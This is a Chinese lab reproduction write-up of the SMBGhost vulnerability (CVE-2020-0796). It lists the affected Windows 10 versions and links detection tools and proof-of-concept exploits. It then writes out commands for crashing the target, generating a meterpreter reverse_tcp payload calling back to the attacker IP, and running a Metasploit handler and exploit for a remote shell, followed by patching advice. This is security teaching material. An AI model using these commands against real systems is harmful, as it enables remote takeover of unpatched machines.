前往小程序,Get更优阅读体验!
立即前往
发布
社区首页 >专栏 >cve-2020-0796(SMB远程代码执行漏洞漏洞)

cve-2020-0796(SMB远程代码执行漏洞漏洞)

作者头像
R0A1NG
发布2022-02-19 09:25:06
发布2022-02-19 09:25:06
1.3K0
举报
文章被收录于专栏:R0A1NG 技术分享R0A1NG 技术分享

漏洞简介

漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。

漏洞影响范围

Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows Server, Version 1903 (Server Core installation) Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for x64-based Systems Windows 10 Version 1909 for ARM64-based Systems Windows Server, Version 1909 (Server Core installation)

漏洞检测

奇安信的检测工具:点击下载

github的某脚本:点击下载

POC地址

蓝屏攻击点击下载 本地提权点击下载 远程执行shell点击下载

复现

攻击机 kali 192.168.23.140 靶机 win10 192.168.23.139 关闭win10fang'huo'q

  • 蓝屏复现

解压蓝屏攻击POC:

执行命令:

python3 CVE-2020-0796.py 192.168.23.139 执行成功,win10蓝屏

  • 本地提权

运行本地提权POC 成功后会打开system权限的窗口

  • 远程执行shell复现

解压远程执行shellPOC:

1.生成反向链接木马

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.23.140 LPORT=6666 -f python -o shell.txt 等待成功后,会生成一个shell.txt文件,

2.修改exp 把shell.txt文件里的buf替换成USER_PAYLOAD

然后打开exploit.py文件,把下面红圈里的内容换成修改后的shell.txt的内容

保存。 3.msf监听 打开msf msfconsole msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.23.140 msf5 exploit(multi/handler) > set lport 6666 msf5 exploit(multi/handler) > run 然后另开终端,运行POC python3 exploit.py -ip 192.168.23.139 等待运行成功,拿到shell

漏洞处理

1.及时更新微软针对该漏洞所发布的的修复补丁 2.关闭445端口

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021 年 03 月,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞简介
  • 漏洞影响范围
  • 漏洞检测
  • POC地址
  • 复现
  • 漏洞处理
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档